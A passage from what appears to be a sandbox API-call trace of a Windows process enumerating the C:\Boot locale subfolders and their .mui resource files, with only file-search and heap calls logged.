dwReserved1=0x240000, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0169.297] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0169.297] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.297] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802198 [0169.325] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.325] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.325] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0169.325] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0169.325] FindClose (in: hFindFile=0x802198 | out: hFindFile=0x802198) returned 1 [0169.325] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.325] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0169.325] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.326] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802158 [0169.326] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.326] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.327] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0169.327] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0169.327] FindClose (in: hFindFile=0x802158 | out: hFindFile=0x802158) returned 1 [0169.327] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.327] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0169.327] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.327] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802658 [0169.328] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.328] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.328] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0169.328] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0169.328] FindClose (in: hFindFile=0x802658 | out: hFindFile=0x802658) returned 1 [0169.328] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.328] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0169.328] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.328] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802118 [0169.329] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.329] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.329] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0169.330] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0169.330] FindClose (in: hFindFile=0x802118 | out: hFindFile=0x802118) returned 1 [0169.330] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.330] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0169.330] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.330] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802118 [0169.331] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.331] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.331] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0169.331] FindClose (in: hFindFile=0x802118 | out: hFindFile=0x802118) returned 1 [0169.331] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.331] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.331] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.331] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802458 [0169.332] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.332] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.332] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0169.332] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0169.332] FindClose (in: hFindFile=0x802458 | out: hFindFile=0x802458) returned 1 [0169.332] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.332] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0169.332] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.332] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801f98 [0169.333] FindNextFileW (in: hFindFile=0x801f98, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.333] FindNextFileW (in: hFindFile=0x801f98, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.333] FindNextFileW (in: hFindFile=0x801f98, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0169.334] FindNextFileW (in: hFindFile=0x801f98, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0169.334] FindClose (in: hFindFile=0x801f98 | out: hFindFile=0x801f98) returned 1 [0169.334] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.334] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0169.334] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.334] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8025d8 [0169.335] 